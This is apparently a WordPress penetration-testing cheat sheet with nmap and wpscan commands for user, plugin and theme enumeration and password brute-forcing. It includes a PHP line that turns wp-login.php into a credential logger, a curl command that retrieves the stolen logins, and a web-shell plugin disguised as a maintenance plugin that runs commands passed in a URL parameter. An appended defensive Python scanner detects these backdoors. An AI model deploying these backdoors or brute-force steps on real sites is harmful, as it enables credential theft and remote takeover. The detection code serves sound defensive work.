Wordpress
Nmap Scan
nmap -n -p<PORT> --script http-wordpress-enum <DNS>

wpscan
Installation
gem install wpscan

Basic Scan
wpscan --url https://example.com

Users
wpscan --url https://example.com --enumerate u

Plugins
wpscan --url https://example.com --enumerate ap

Themes
wpscan --url https://example.com --enumerate at

With output
wpscan --url https://example.com --output example.json

Custom User-Agent
wpscan --url https://example.com --user-agent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"

Disable TLS check
wpscan --url https://brainfuck.htb --disable-tls-checks

Brute-Forcing
With username
wpscan --url https://example.com --passwords passwords.txt --usernames admin

With users wordlist
wpscan --url https://example.com --passwords passwords.txt --usernames users.txt

With a custom wordlist
wpscan --url https://example.com --passwords custom.txt

Vulnerability Scanner
Full Scan
wpscan --url https://example.com --enumerate vp,vt,tt

Plugins
wpscan --url https://example.com --enumerate vp

Themes
wpscan --url https://example.com --enumerate vt

Timthumbs
wpscan --url https://example.com --enumerate tt

Uses WPVulnDB
wpscan --url https://example.com --enumerate vp,vt,tt --api-token YOUR_API_TOKEN

Harvesting Credentials
If it is possible to write to wp-login.php, add this line just after <?php:
file_put_contents("/var/www/html/dev_wiki/hijack.txt", $_POST['log'] . " : " . $_POST['pwd'], FILE_APPEND);
Use this command to fetch the hijacked file as soon as it is used:
watch -n 1 curl -s -X GET http://10.10.10.78/dev_wiki/hijack.txt

Create Malicious Plugins
POC
<?php
/*
Plugin Name: WordPress Maintenance Plugin
Plugin URI: wordpress.org
Description: WordPress Maintenance Activities
Author: WordPress
Version: 1.0
Author URI: wordpress.org
*/
system($_GET["cmd"]);
?>

Remember to compress it
zip evil-plugin.zip evil-plugin.php

Call The Web Shell
curl http://SITE/main/wp-content/plugins/evil-plugin/shell.php?cmd=id
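A defensive counterpart to the two backdoors above, added here as an example that is not part of the original cheat sheet: a small Python scanner that flags a credential logger in wp-login.php and a request-driven command sink under wp-content/plugins. The rule names, file paths and sample PHP files are constructed for this demo.

```python
import re
from pathlib import Path
from tempfile import TemporaryDirectory

# Signatures for the two backdoors shown above (constructed for this example):
# a shell sink fed straight from request input, and a logger that writes the
# wp-login.php POST fields "log"/"pwd" to disk.
SUSPICIOUS = {
    "cmd-exec-from-request": re.compile(
        r"\b(system|exec|shell_exec|passthru|popen)\s*\(\s*\$_(GET|POST|REQUEST)\b"),
    "login-credential-logger": re.compile(
        r"file_put_contents\s*\([^;]*\$_POST\[\s*['\"](log|pwd)['\"]\s*\]"),
}

def scan_php_source(source: str) -> list:
    """Return the names of every rule that matches this PHP source."""
    return [rule for rule, rx in SUSPICIOUS.items() if rx.search(source)]

def scan_wordpress_root(root: Path) -> list:
    """Check wp-login.php and every PHP file under wp-content/plugins;
    return sorted (rule, path-relative-to-root) pairs."""
    candidates = [root / "wp-login.php"]
    candidates += (root / "wp-content" / "plugins").rglob("*.php")
    findings = []
    for path in candidates:
        if path.is_file():
            rel = path.relative_to(root).as_posix()
            for rule in scan_php_source(path.read_text(errors="replace")):
                findings.append((rule, rel))
    return sorted(findings)

def demo() -> list:
    """Scan a constructed WordPress tree: a tampered login page, a web-shell
    plugin, and a benign plugin that also calls file_put_contents."""
    with TemporaryDirectory() as tmp:
        root = Path(tmp)
        plugins = root / "wp-content" / "plugins"
        (plugins / "evil-plugin").mkdir(parents=True)
        (plugins / "hello").mkdir()
        (root / "wp-login.php").write_text(
            "<?php\nfile_put_contents('/tmp/h.txt', $_POST['log'] . ':' . $_POST['pwd'], FILE_APPEND);\n")
        (plugins / "evil-plugin" / "shell.php").write_text('<?php\nsystem($_GET["cmd"]);\n')
        (plugins / "hello" / "hello.php").write_text(
            "<?php\n/* Plugin Name: Hello */\nfile_put_contents('cache.txt', date('c'));\n")
        return scan_wordpress_root(root)

if __name__ == "__main__":
    for rule, path in demo():
        print(f"{rule}: {path}")
```

Point scan_wordpress_root at a real document root to audit an installation; a clean site yields an empty list, and the benign plugin in the demo shows that file_put_contents alone is not flagged.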